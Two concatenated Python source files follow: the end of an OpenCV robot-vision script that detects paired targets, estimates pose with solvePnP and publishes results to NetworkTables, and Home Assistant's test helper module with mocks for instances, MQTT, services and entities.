ret, mtx, dist, rotation_vectors, translation_vectors = pkl.load(f)
if INPUT_DEVICE == "image":
webcam = cv2.imread("my_photo-3.jpg")
webcam = cv2.resize(webcam, (640, 480))
def cut_image(img, points):
points2 = points
if type(points) == list:
points2 = np.array(points)
r = cv2.boundingRect(points2)
return img[r[1]:r[1] + r[3], r[0]:r[0] + r[2]]
# Debug video writers: cv2.VideoWriter expects an integer fourcc code plus the
# frame rate and frame size, so build the fourcc explicitly (frames below are
# written at the 640x480 working resolution).
fourcc = cv2.VideoWriter_fourcc(*"X264")
camera1 = cv2.VideoWriter("camera1_feed.mkv", fourcc, 30, (640, 480))
camera2 = cv2.VideoWriter("camera2_feed.mkv", fourcc, 30, (640, 480))
camera3 = cv2.VideoWriter("camera3_feed.mkv", fourcc, 30, (640, 480))
camera4 = cv2.VideoWriter("camera4_feed.mkv", fourcc, 30, (640, 480))
camera5 = cv2.VideoWriter("camera5_feed.mkv", fourcc, 30, (640, 480))
camera6 = cv2.VideoWriter("camera6_feed.mkv", fourcc, 30, (640, 480))
def vision_code(original_image):
image_org = None
if INPUT_DEVICE == "image":
image_org = webcam
if INPUT_DEVICE == "video" or INPUT_DEVICE == "prerecorded":
image_unchanged = original_image
# if not got_image:
# return None, None, None
image_unchanged = cv2.resize(image_unchanged, (640, 480))
camera1.write(image_unchanged)
# print(image_unchanged.size())
image_unchanged = cv2.undistort(image_unchanged, mtx, dist)
camera2.write(image_unchanged)
# image_unchanged.resize((640, 480))
image_org = image_unchanged
# image_unchanged = cv2.resize(image_unchanged, (640, 480))
# image_unchanged = cv2.undistort(image_unchanged, mtx, dist)
if INPUT_DEVICE == "realsense":
frames = pipeline.wait_for_frames()
color_frame = frames.get_color_frame()
color_image = np.asanyarray(color_frame.get_data())
image_org = color_image
cv2.imshow("realsense", image_org)
debug_print("Begin processing")
frame = process_image(image_org)
camera3.write(frame)
debug_print("Finish processing")
# Display output of pipeline
if DISPLAY:
cv2.imshow("Frame", frame)
# Get contours
_, contours, _ = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
new_contours = contours
debug_print("Got contours")
# Filter contours based on perimeter-to-area ratio
simplified = []
if len(new_contours) > 1:
matched = []
good_ratio = []
for cnt in new_contours:
if cv2.contourArea(cnt) > 50:
ratio = cv2.arcLength(cnt, True) / cv2.contourArea(cnt)
maximum = 0
minimum = 100000
for w in cnt:
if w[0][0] > maximum:
maximum = w[0][0]
if w[0][0] < minimum:
minimum = w[0][0]
if ratio < 0.5:
# 0.3
# and maximum < 610 and minimum > 80
simplified.append(cnt)
good_ratio.append(True)
if len(simplified) > 1:
closest_contours = []
contour_list = []
confirmed_pairs = []
main_count = 0
for contour in simplified:
moments = cv2.moments(contour)
x_cent = int(moments['m10'] / moments['m00'])
y_cent = int(moments['m01'] / moments['m00'])
contour_list.append([x_cent, y_cent, contour])
# contour_list = sorted(contour_list, key=itemgetter(0))
for data in contour_list:
x_cent = data[0]
closest_value = 9999999
closest_data = []
closest_count = 0
count = 0
for test in contour_list:
x_difference = abs(test[0] - x_cent)
if main_count not in matched:
if x_difference < closest_value and x_difference != 0:
closest_count = count
closest_value = x_difference
closest_data = test
count += 1
matched.append(main_count)
matched.append(count)
confirmed_pairs.append([main_count, closest_count])
closest_contours.append(closest_data)
main_count += 1
double_confirmed = []
double_confirmed_list = []
for x in confirmed_pairs:
if x[0] == confirmed_pairs[x[1]][1]:
x_list = contour_list[x[0]][2]
n_list = contour_list[x[1]][2]
                    cv2.drawContours(image_org, new_contours, 1, (255, 0, 0), 25)
if [x[1], x[0]] not in double_confirmed_list and len(x_list) > 2 and len(n_list) > 2:
double_confirmed.append([n_list, x_list])
double_confirmed_list.append(x)
confirmed_contours = double_confirmed
debug_print("End contour filter")
if True:
robot_distance = None
first_angle = None
second_angle = None
for i in confirmed_contours:
debug_print("Begin solvepnp")
rotation_vector, translation_vector, average_rotation, average_translation, img_pts = \
solve_pnp_code(i)
debug_print("End solvepnp")
# PS3 camera matrix
# matrix2 = [[515.45484128, 0, 285.10931073], [0, 518.05417133, 281.68350735], [0, 0, 1]]
if DISPLAY:
# mult = 10
# add = 10
# image_org = draw(image_org, [(14.626771 * mult + add, 5.324812 * mult), (13.249681 *
# mult + add
# , 0),
# (0 + add, 5.324812 * mult)]
# , img_pts)
debug_print("Drawing axis")
cv2.aruco.drawAxis(image_org, mtx, dist, rotation_vector, translation_vector, 10)
cv2.imshow("axis", image_org)
debug_print("Doing Rodriques")
# destination = cv2.Rodrigues(rotation_vector)[0]
robot_distance, first_angle, second_angle = compute_output_values(average_rotation,
average_translation)
debug_print("finished")
# print("robot_distance")
# print(robot_distance)
print(str(math.degrees(first_angle)) + ", " + str(math.degrees(second_angle)))
if NETWORK_TABLES:
sd.putNumber("robot_distance", robot_distance)
sd.putNumber("angle_a", math.degrees(first_angle))
sd.putNumber("angle_b", math.degrees(second_angle))
NetworkTables.flush()
# break
return robot_distance, first_angle, second_angle
return None, None, None
repetitions = 0
startTime = time.monotonic()
# for o in list_thing:
if True:
# distance_list = []
# angle1_list = []
# angle2_list = []
# if not o:
# continue
if INPUT_DEVICE == "prerecorded":
webcam = cv2.VideoCapture(VIDEO_NAME)
if INPUT_DEVICE == "video":
import os
# video_name = "folder_of_videos/my_video-" + o[0] + "_newer.mkv"
# webcam = cv2.VideoCapture(video_name)
# webcam = cv2.VideoCapture(CAMERA_ID)
os.system("v4l2-ctl --device " + str(CAMERA_ID) + " -c exposure_auto=1")
time.sleep(1)
print("auto")
os.system("v4l2-ctl --device " + str(CAMERA_ID) + " -c white_balance_temperature_auto=0")
time.sleep(1)
print("balance")
os.system("v4l2-ctl --device " + str(CAMERA_ID) + " -c white_balance_temperature=3004")
time.sleep(1)
print("temp")
# webcam = cv2.VideoCapture(CAMERA_ID)
time.sleep(1)
os.system("v4l2-ctl --device " + str(CAMERA_ID) + " -c exposure_absolute=8")
# webcam.set(15, 8)
print("exposure")
time.sleep(1)
webcam = WebcamVideoStream(CAMERA_ID).start()
distance = "blah blah blah"
counter = 0
while True:
if FRAME_BY_FRAME:
while True:
if cv2.waitKey(1) & 0xFF == ord("x"):
break
if INPUT_DEVICE == "video" or INPUT_DEVICE == "prerecorded":
if cv2.waitKey(1) & 0xFF == ord("q"):
break
ret, image = webcam.read()
if counter > 0:
counter -= 0.1
if not ret:
counter += 1
print("This shouldn't happen (image not captured successfully)")
if counter > 30:
print("Exiting code, camera/video not responding")
exit(1)
continue
distance, angle1, angle2 = vision_code(image)
# if not distance:
# continue
# distance_list.append(distance)
# angle1_list.append(angle1)
# angle2_list.append(angle2)
# time.sleep(0.02)
repetitions += 1
if repetitions >= 1000:
print("average time per cycle = ", (time.monotonic() - startTime) / 1000, "seconds")
print("average FPS = ", 1 / ((time.monotonic() - startTime) / 1000))
startTime = time.monotonic()
repetitions = 0
if INPUT_DEVICE == "image":
while True:
if cv2.waitKey(1) & 0xFF == ord("q"):
break
if INPUT_DEVICE == "image":
break
# if len(distance_list) > 0:
# print("dist")
# print(float(o[1]) - statistics.median(distance_list))
# print("angle")
# print(float(o[2]) - statistics.median(angle1_list))
webcam.stop()
cv2.destroyAllWindows()
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
from datetime import timedelta
import functools as ft
import os
import sys
from unittest.mock import patch, MagicMock, Mock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from homeassistant import core as ha, loader, config_entries
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers import (
intent, entity, restore_state, entity_registry,
entity_platform)
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import mqtt, recorder
from homeassistant.util.async import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
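# Illustrative sketch (not part of the helpers above, and only an assumption
# about how a synchronous test would drive the returned instance). The entity
# id 'light.demo' is hypothetical.
def _example_get_test_home_assistant_usage():
    """Start a test instance, poke the state machine, then shut it down."""
    hass = get_test_home_assistant()
    try:
        hass.start()
        hass.states.set('light.demo', STATE_ON)
        assert hass.states.get('light.demo').state == STATE_ON
    finally:
        hass.stop()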
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config.async_load = Mock()
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
def async_add_job(target, *args):
"""Add a magic mock."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
hass.async_add_job = async_add_job
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
if 'custom_components.test' not in loader.AVAILABLE_COMPONENTS:
yield from loop.run_in_executor(None, loader.prepare, hass)
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
yield from orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@asyncio.coroutine
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': time})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or {}
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
class MockModule(object):
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None, async_setup_entry=None,
async_unload_entry=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
class MockPlatform(object):
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
scan_interval=timedelta(seconds=15),
parallel_updates=0,
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
scan_interval=scan_interval,
parallel_updates=parallel_updates,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
elif method is None:
return self.calls[-1]
else:
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=0, entry_id=None,
source=config_entries.SOURCE_USER, title='Mock Title',
state=None):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
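# Illustrative sketch (not used by the helpers above): patch_yaml_files makes
# load_yaml read from in-memory strings. The file name and contents below are
# hypothetical.
def _example_patch_yaml_files_usage():
    """Load a fake YAML file through the patched open()."""
    with patch_yaml_files({'test.yaml': 'hello: world'}):
        assert yaml.load_yaml('test.yaml') == {'hello': 'world'}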
def mock_coro(return_value=None):
"""Return a coro that returns a value."""
return mock_coro_func(return_value)()
def mock_coro_func(return_value=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
    - count: The number of valid platforms that should be set up
    - domain: The domain to count; optional, as it can be determined
      automatically most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_CACHE
hass.data[key] = {
state.entity_id: state for state in states}
_LOGGER.debug('Restore cache: %s', hass.data[key])
assert len(hass.data[key]) == len(states), \
"Duplicate entity_id? {}".format(states)
hass.state = ha.CoreState.starting
mock_component(hass, recorder.DOMAIN)
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
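# Illustrative sketch (not exercised above): MockDependency works both as a
# context manager and as a decorator. 'somelib' and its 'submodule' are
# hypothetical module names.
def _example_mock_dependency_usage():
    """Mock an import as a context manager and as a decorator."""
    with MockDependency('somelib', 'submodule') as mock_somelib:
        mock_somelib.submodule.do_work.return_value = 42
    @MockDependency('somelib')
    def test_with_mock(mock_somelib):
        """Receive the mocked root module as an extra positional argument."""
        assert isinstance(mock_somelib, MagicMock)
    test_with_mock()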
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
def _handle(self, attr):
"""Helper for the attributes."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
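# Illustrative sketch (not referenced above): MockEntity returns the values it
# was constructed with and defers to the Entity defaults otherwise. The ids
# below are hypothetical.
def _example_mock_entity_usage():
    """Build a MockEntity with a couple of overridden attributes."""
    ent = MockEntity(entity_id='sensor.demo', name='demo', unique_id='demo-1234')
    assert ent.entity_id == 'sensor.demo'
    assert ent.name == 'demo'
    assert ent.unique_id == 'demo-1234'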
|